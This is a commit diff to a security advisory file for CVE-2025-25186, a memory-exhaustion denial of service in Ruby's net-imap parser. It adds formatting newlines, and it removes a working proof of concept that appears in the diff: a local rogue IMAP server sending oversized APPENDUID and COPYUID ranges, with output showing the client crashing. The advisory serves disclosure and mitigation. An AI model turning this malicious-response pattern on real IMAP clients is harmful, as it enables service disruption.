Update CVE-2025-25186.yml

* Added extra newlines after the markdown headers for readability.
* Removed the overly long Proof of Concept example.

Author: postmodern

gems/net-imap/CVE-2025-25186.yml

@@ -7,6 +7,7 @@ title: Possible DoS by memory exhaustion in net-imap
 date: 2025-02-10
 description: |
   ### Summary
+  
   There is a possibility for denial of service by memory exhaustion in
   `net-imap`'s response parser.  At any time while the client is
   connected, a malicious server can send  can send highly compressed
@@ -16,6 +17,7 @@ description: |
   expanded size of the ranges.
 
   ### Details
+  
   IMAP's `uid-set` and `sequence-set` formats can compress ranges of
   numbers, for example: `"1,2,3,4,5"` and `"1:5"` both represent the
   same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or
@@ -62,7 +64,9 @@ description: |
   ### Fixes
 
   #### Preferred Fix, minor API changes
+  
   Upgrade to v0.4.19, v0.5.6, or higher, and configure:
+  
   ```ruby
   # globally
   Net::IMAP.config.parser_use_deprecated_uidplus_data = false
@@ -89,6 +93,7 @@ description: |
   will be removed from v0.6)_.
 
   #### Mitigation, backward compatible API
+  
   Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.
 
   For backward compatibility, `uid-set` can still be expanded
@@ -120,137 +125,20 @@ description: |
   of retained responses, a simple handler might look something like
   the following:
 
-    ```ruby
-    limit = 1000
-    imap.add_response_handler do |resp|
-      next unless resp.respond_to?(:name) && resp.respond_to?(:data)
-      name = resp.name
-      code = resp.data.code&.name if resp.data.respond_to?(:code)
-      if Net::IMAP::VERSION > "0.4.0"
-        imap.responses(name) { _1.slice!(0...-limit) }
-        imap.responses(code) { _1.slice!(0...-limit) }
-      else
-        imap.responses(name).slice!(0...-limit)
-        imap.responses(code).slice!(0...-limit)
-      end
-    end
-    ```
-
-  ### Proof of concept
-
-  Save the following to a ruby file (e.g: `poc.rb`) and
-  make it executable:
   ```ruby
-  #!/usr/bin/env ruby
-  require 'socket'
-  require 'net/imap'
-
-  if !defined?(Net::IMAP.config)
-    puts "Net::IMAP.config is not available"
-  elsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data)
-    puts "Net::IMAP.config.parser_use_deprecated_uidplus_data is not available"
-  else
-    Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size
-    puts "Updated parser_use_deprecated_uidplus_data to :up_to_max_size"
-  end
-
-  size = Integer(ENV["UID_SET_SIZE"] || 2**32-1)
-
-  def server_addr
-    Addrinfo.tcp("localhost", 0).ip_address
-  end
-
-  def create_tcp_server
-    TCPServer.new(server_addr, 0)
-  end
-
-  def start_server
-    th = Thread.new do
-      yield
-    end
-    sleep 0.1 until th.stop?
-  end
-
-  def copyuid_response(tag: "*", size: 2**32-1, text: "too large?")
-    "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n"
-  end
-
-  def appenduid_response(tag: "*", size: 2**32-1, text: "too large?")
-    "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n"
-  end
-
-  server = create_tcp_server
-  port = server.addr[1]
-  puts "Server started on port #{port}"
-
-  # server
-  start_server do
-    sock = server.accept
-    begin
-      sock.print "* OK test server\r\n"
-      cmd = sock.gets("\r\n", chomp: true)
-      tag = cmd.match(/\A(\w+) /)[1]
-      puts "Received: #{cmd}"
-
-      malicious_response = appenduid_response(size:)
-      puts "Sending: #{malicious_response.chomp}"
-      sock.print malicious_response
-
-      malicious_response = copyuid_response(size:)
-      puts "Sending: #{malicious_response.chomp}"
-      sock.print malicious_response
-      sock.print "* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\r\n"
-      sock.print "#{tag} OK CAPABILITY completed\r\n"
-
-      cmd = sock.gets("\r\n", chomp: true)
-      tag = cmd.match(/\A(\w+) /)[1]
-      puts "Received: #{cmd}"
-      sock.print "* BYE If you made it this far, you passed the test!\r\n"
-      sock.print "#{tag} OK LOGOUT completed\r\n"
-    rescue Exception => ex
-      puts "Error in server: #{ex.message} (#{ex.class})"
-    ensure
-      sock.close
-      server.close
+  limit = 1000
+  imap.add_response_handler do |resp|
+    next unless resp.respond_to?(:name) && resp.respond_to?(:data)
+    name = resp.name
+    code = resp.data.code&.name if resp.data.respond_to?(:code)
+    if Net::IMAP::VERSION > "0.4.0"
+      imap.responses(name) { _1.slice!(0...-limit) }
+      imap.responses(code) { _1.slice!(0...-limit) }
+    else
+      imap.responses(name).slice!(0...-limit)
+      imap.responses(code).slice!(0...-limit)
     end
   end
-
-  # client
-  begin
-    puts "Client connecting,.."
-    imap = Net::IMAP.new(server_addr, port: port)
-    puts "Received capabilities: #{imap.capability}"
-    pp responses: imap.responses
-    imap.logout
-  rescue Exception => ex
-    puts "Error in client: #{ex.message} (#{ex.class})"
-    puts ex.full_message
-  ensure
-    imap.disconnect if imap
-  end
-  ```
-
-  Use `ulimit` to limit the process's virtual memory.  The following
-  example limits virtual memory to 1GB:
-  ```console
-  $ ( ulimit -v 1000000 && exec ./poc.rb )
-  Server started on port 34291
-  Client connecting,..
-  Received: RUBY0001 CAPABILITY
-  Sending: * OK [APPENDUID 1 1:4294967295] too large?
-  Sending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large?
-  Error in server: Connection reset by peer @ io_fillbuf - fd:9  (Errno::ECONNRESET)
-  Error in client: failed to allocate memory (NoMemoryError)
-  /gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError)
-          from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command'
-          from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
-          from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
-          from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command'
-          from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability'
-          from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
-          from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
-          from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability'
-          from /workspace/poc.rb:70:in '<main>'
   ```
 cvss_v3: 6.5
 unaffected_versions: